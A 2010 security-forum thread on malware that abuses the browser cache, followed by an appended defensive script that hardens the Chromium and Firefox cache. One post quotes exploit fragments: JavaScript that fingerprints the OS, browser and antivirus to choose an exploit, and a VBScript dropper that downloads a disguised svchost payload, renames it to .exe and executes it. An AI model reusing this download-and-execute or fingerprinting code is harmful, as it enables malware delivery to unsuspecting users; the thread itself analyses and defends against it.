Using the Browser Cache to Bypass Security

Discussion in 'malware problems & news' started by MrBrian, Nov 3, 2010.

Thread Status:
Not open for further replies.
  1. MrBrian

    MrBrian Registered Member

    Joined:
    Feb 24, 2008
    Posts:
    6,032
    Location:
    USA
  2. xxJackxx

    xxJackxx Registered Member

    Joined:
    Oct 23, 2008
    Posts:
    4,052
    Location:
    USA
    It looks like this was fixed already, and if it wasn't SRP would stop this from executing. Another good reason to use it. ;)
     
  3. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    Disabling the browser cache would defeat it, right?

    I know IE8 doesn't allow one to completely nullify the browser cache (no idea about IE9 o_O). Not sure about Firefox. But it is possible with Chromium. If no caching is happening, then there's no bypass.
     
  4. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    Check dis Y'all ;)

    [image: ram.gif]

    Surfing cache is ONLY in RAM = :thumb:

    [image: w.gif]

    NOTHING in these = :thumb:

    [image: oc.gif]

    [image: dc.gif]

    After closing FF I have it set to delete cache/history etc., so even ALL that gets wiped from RAM = :thumb:

    Brilliant I'd say :D
     
  5. ParadigmShift

    ParadigmShift Registered Member

    Joined:
    Aug 7, 2008
    Posts:
    203
    There's some powerful insight.
     
  6. vasa1

    vasa1 Registered Member

    Joined:
    May 1, 2010
    Posts:
    4,152
    Could you share how this (completely nullifying browser cache in Chromium) is done?
     
  7. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Yes, for sure!

    This exploit is a good example of "nothing has really changed."

    Note the screen shot in the article showing how the code checks for Operating System and Browser. Five years ago this technique emerged in the postcard.com exploit, where a link in an email sent the user to a web site that had this code to check the version of IE, the operating system, and whether certain AV were present, and then dished out exploits accordingly:

    Code:
    // launching exploit which number is depends on Windows and IE versions
    function Get_Win_Version(IE_vers)
    {
         // IE_vers is the browser's user-agent string
         if (IE_vers.indexOf('Windows 95') != -1) return "95";
         else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT";
         else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME";
         else if (IE_vers.indexOf('Windows 98') != -1) return "98";
         else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K";
         else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP";
         else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3";
    }

    ..................

    // later: the payload is chosen from the detected Windows version, the
    // installed Java VM version (JVM_vers) and the AV flags (fNortonAV, fMcAfee)
      case "2K":
        if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
        {  ExploitNumber=1;  }
        else     // if JVM = 5.0.3810.0 or higher
        {
          if ((fNortonAV==0)&&(fMcAfee==0))
          {  ExploitNumber=3;  }
          else
          {  ExploitNumber=2;  }
        }
        break;
    
    Continuing in the article:

    An old exploit against IE6 six years ago used a similar technique, where an executable file with a spoofed extension is downloaded to the browser cache to bypass security, then copied to a temp folder and renamed to .exe, and then attempts to execute:

    Code:
    on error resume next
    ' the payload is fetched under a .txt extension so it lands in the browser cache
    OOOOOOOOOOOOOwwwwwww ="[path to malware]/svchost.txt"

    ' ... then copied to a temp folder under its real extension
    fname1= F.BuildPath("c:\temp","svchost.exe")

    ' ... and executed; the verb "open" is assembled from fragments
    Q.ShellExecute fname1,"","","o"&"pe"&"n",0
    

    Continuing:

    URLDownloadToFileA refers to the Windows command to call out to the internet to download a file. It's been used since the early ANI and WMF exploits, and most recently in PDF exploits. Here is code from a malicious PDF file:

    [three screenshots of the PDF code; images not reproduced]

    So, it's a cat-and-mouse game: vulnerabilities are patched, security products monitor actions of malware that attempts to execute, malware authors find new ways to bypass these things with new vulnerabilities, etc, etc.

    But the goal is the same old thing: download/execute a malware file.

    If protection against that is part of one's security setup, that takes care of a lot of exploits!

    ----
    rich
     
  8. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    Cache does happen, but it doesn't get written to disk, due to the restrictions I have in place.

    I have Chromium start with the command switch --disk-cache-size=N (N is the cache size in bytes).

    Some say 0 doesn't prevent any caching; others say 1 works, meaning the cache will have a size limit of 1 byte.

    Either way, I have my Chromium profiles with an ACL that denies write permissions. I had to set it on the full profile folder, because setting the Cache folder with an ACL denying write permissions wouldn't work: Chromium would bypass it, removing the deny permissions.

    So, while caching does happen, it only happens in memory; it won't be written to disk.

    I should have expressed myself better, sorry. :(

    Maybe you'll find this an easier route for you as well. It was for me.

    -Edit-

    Forgot this part --media-cache-size=1

    -Edit 2-

    You may also add the following instead:

    --disk-cache-dir="path", and set the folder with a write deny permission. It should work fine as well.
     
    Last edited: Nov 5, 2010
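Putting posts #4 and #8 into something reproducible, as an added example that is not from the thread or from any of its posters: a POSIX shell script that (a) creates a cache directory Chromium cannot write to and builds the launch switches m00nbl00d lists, and (b) writes a Firefox user.js that keeps the cache in memory only and wipes it at exit, which is the behaviour CloneRanger's screenshots show (the exact prefs he set are not visible here; the ones below are the standard about:config prefs for that and are my choice). Assumed: a Linux host with GNU `stat`, a Chromium binary named `chromium`, and a profile path supplied by the caller; the Windows equivalent of `chmod a-w` is the deny-write ACL from post #8 (for example `icacls "<dir>" /deny "<user>:(OI)(CI)W"`).

```shell
#!/bin/sh
# Added example, not code from the thread. Keeps browser cache off the disk:
# Chromium via a read-only cache dir plus size switches, Firefox via user.js.
# Assumptions: Linux, GNU stat, binary name "chromium", caller-supplied paths.

# Chromium switches from post #8: tiny disk/media cache limits (1 byte, since
# 0 reportedly does not disable caching) and a cache directory of our choosing.
# Printed so the caller can splice it into an exec line.
chromium_cache_args() {
    cache_dir="$1"
    printf '%s' "--disk-cache-dir=$cache_dir --disk-cache-size=1 --media-cache-size=1"
}

# Create the cache directory and strip every write bit. Post #8 notes that a
# deny on the profile's own Cache subfolder got removed by Chromium, so point
# --disk-cache-dir at a directory outside the profile instead.
make_readonly_cache_dir() {
    dir="$1"
    mkdir -p "$dir" || return 1
    chmod a-w "$dir"
}

# Octal mode of a path (e.g. "555"). Used for checking instead of "test -w",
# because root bypasses mode bits and "test -w" would report writable.
dir_mode() {
    stat -c '%a' "$1"
}

# Firefox: memory-only cache, no disk cache, and clear cache on shutdown.
# These are standard about:config prefs; which ones post #4 used is not visible.
write_firefox_userjs() {
    profile="$1"
    mkdir -p "$profile" || return 1
    cat > "$profile/user.js" <<'EOF'
// written by the example script: memory cache only, nothing on disk, wiped at exit
user_pref("browser.cache.disk.enable", false);
user_pref("browser.cache.memory.enable", true);
user_pref("privacy.sanitize.sanitizeOnShutdown", true);
user_pref("privacy.clearOnShutdown.cache", true);
EOF
}

# Number of prefs written, so a caller can sanity-check the generated file.
firefox_userjs_pref_count() {
    grep -c '^user_pref(' "$1/user.js"
}

# Stand-alone use: ./cache-hardening.sh setup [firefox-profile-dir]
if [ "${1:-}" = "setup" ]; then
    cache="${TMPDIR:-/tmp}/chromium-ro-cache"
    make_readonly_cache_dir "$cache"
    write_firefox_userjs "${2:-$HOME/.mozilla/firefox/hardened.default}"
    echo "chromium $(chromium_cache_args "$cache")"
fi
```

After running `setup`, confirm the cache directory stays empty across a browsing session (`ls -A` on it) and that Chromium's profile contains no growing `Cache` folder; if it does, Chromium ignored the switch or rewrote permissions, which is exactly the failure mode post #8 describes for the per-folder ACL.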